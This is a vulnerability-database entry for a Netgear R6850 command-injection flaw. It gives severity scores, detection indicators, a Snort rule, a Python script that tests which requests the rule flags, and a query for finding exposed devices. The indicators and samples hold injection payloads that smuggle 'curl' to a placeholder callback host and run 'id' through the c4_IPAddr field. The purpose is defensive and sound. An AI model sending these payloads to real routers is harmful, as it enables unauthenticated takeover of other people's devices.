cbcvebase.
CVE-2024-30568
published 2024-04-03

CVE-2024-30568: Netgear R6850 1.1.0.88 was discovered to contain a command injection vulnerability via the c4-IPAddr parameter.

Priority: P1 · 81 · critical · CVSS 3.1 base score 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available
EPSS: 47.20% (98.7th percentile)

Affected

1 range
Vendor | Product | Version range | Fixed in
netgear | r6850_firmware | (not given) | (not given)

Detection & IOCs (extracted from sources)

url: /setup.cgi?id=0&sp=1337
command: todo=ping_test&c4_IPAddr=127.0.0.1 && curl {{interactsh-url}}&next_file=diagping.htm
path: /setup.cgi
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Netgear R6850 Command Injection via c4_IPAddr Parameter Attempt (CVE-2024-30568)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/setup.cgi|3f|"; startswith; http.request_body; content:"todo|3d|ping_test"; fast_pattern; content:"c4_IPAddr|3d|"; pcre:"/^.*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24)|(?:\x26|%26){2})+/R"; content:"next_file|3d|diagping.htm"; reference:cve,2024-30568; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-30568.yaml; classtype:attempted-admin; sid:2061410; rev:1; metadata:affected_product Netgear_Router, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_04_09, cve CVE_2024_30568, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_04_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets HTTP POST to /setup.cgi with body parameters todo=ping_test and c4_IPAddr containing shell metacharacters (;, newline, backtick, |, $, &&) followed by next_file=diagping.htm
  • The Snort/Suricata PCRE pattern for injection detection in c4_IPAddr body parameter is: /^.*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24)|(?:\x26|%26){2})+/R — matches URL-encoded or raw shell metacharacters after the parameter value
  • Exploitation is unauthenticated; no session cookie or authentication header is required. Detect POST requests to /setup.cgi from unauthenticated sources.
  • Out-of-band callback (DNS/HTTP) to an attacker-controlled server is the primary indicator of successful exploitation; monitor for unexpected outbound DNS/HTTP from router management IPs.
  • FOFA query for identifying exposed targets: app="NETGEAR" && "R6850"
  • Vulnerability is only confirmed on firmware version V1.1.0.88; other versions are not listed as affected.
  • The Snort rule (sid:2061410) is scoped to plaintext traffic only; TLS-wrapped management interfaces will not be detected by this rule.
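The following is an added example, not code from this page, from Emerging Threats or from Netgear: it re-implements the ANDed conditions of the Snort rule above (POST, URI starting with /setup.cgi?, todo=ping_test, a raw or URL-encoded shell metacharacter after c4_IPAddr=, and next_file=diagping.htm) in Python so a defender can check which request shapes the rule would and would not alert on before deploying it. The parameter spelling c4_IPAddr follows the rule and Nuclei template rather than the c4-IPAddr spelling in the CVE text; the sample requests are constructed, except for the body taken from the Nuclei command string quoted on this page.

```python
import re

# Metacharacter alternation copied from the rule's pcre (raw byte or URL-encoded).
# The rule applies it with /R, i.e. relative to the end of the "c4_IPAddr=" match,
# so the regex is anchored at the start of the remainder of the body.
META_RE = re.compile(
    r"^.*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)"
    r"|(?:\x7c|%7[Cc])|(?:\x24|%24)|(?:\x26|%26){2})+"
)
PARAM = "c4_IPAddr="


def matches_rule(method: str, uri: str, body: str) -> bool:
    """Return True when a request satisfies every condition of sid:2061410.

    The rule ANDs four content matches and one pcre; any missing piece means
    no alert, which is why the samples below include near misses.
    """
    if method != "POST":                       # http.method; content:"POST"
        return False
    if not uri.startswith("/setup.cgi?"):      # http.uri; content:"/setup.cgi|3f|"; startswith
        return False
    if "todo=ping_test" not in body:           # http.request_body; content:"todo|3d|ping_test"
        return False
    idx = body.find(PARAM)                     # content:"c4_IPAddr|3d|"
    if idx == -1:
        return False
    remainder = body[idx + len(PARAM):]
    if META_RE.match(remainder) is None:       # pcre:"/.../R"
        return False
    return "next_file=diagping.htm" in body    # content:"next_file|3d|diagping.htm"


# Constructed sample requests (not captured traffic). "raw-double-ampersand"
# reuses the Nuclei template body quoted on this page; the others are variants
# built to probe the rule's scope.
SAMPLE_REQUESTS = [
    {"name": "benign-ping", "method": "POST", "uri": "/setup.cgi?id=0&sp=1337",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1&next_file=diagping.htm"},
    {"name": "raw-double-ampersand", "method": "POST", "uri": "/setup.cgi?id=0&sp=1337",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1 && curl {{interactsh-url}}&next_file=diagping.htm"},
    {"name": "encoded-semicolon", "method": "POST", "uri": "/setup.cgi?id=0&sp=1337",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1%3Bid&next_file=diagping.htm"},
    {"name": "wrong-method", "method": "GET", "uri": "/setup.cgi?id=0&sp=1337",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1%3Bid&next_file=diagping.htm"},
    {"name": "other-endpoint", "method": "POST", "uri": "/index.cgi?id=0",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1%3Bid&next_file=diagping.htm"},
    {"name": "missing-next-file", "method": "POST", "uri": "/setup.cgi?id=0&sp=1337",
     "body": "todo=ping_test&c4_IPAddr=127.0.0.1%3Bid"},
]


def scan(requests):
    """Return the names of the sample requests the rule logic alerts on."""
    return [r["name"] for r in requests
            if matches_rule(r["method"], r["uri"], r["body"])]


if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        verdict = "ALERT" if matches_rule(r["method"], r["uri"], r["body"]) else "pass"
        print(f"{r['name']:<22} {verdict}")
```

Running the script shows only the two bodies carrying a metacharacter after c4_IPAddr= on a POST to /setup.cgi? with next_file=diagping.htm are flagged; the near-miss samples illustrate how tightly the rule is scoped to the Nuclei template's request shape, which is worth knowing when tuning coverage for this CVE on the management interface.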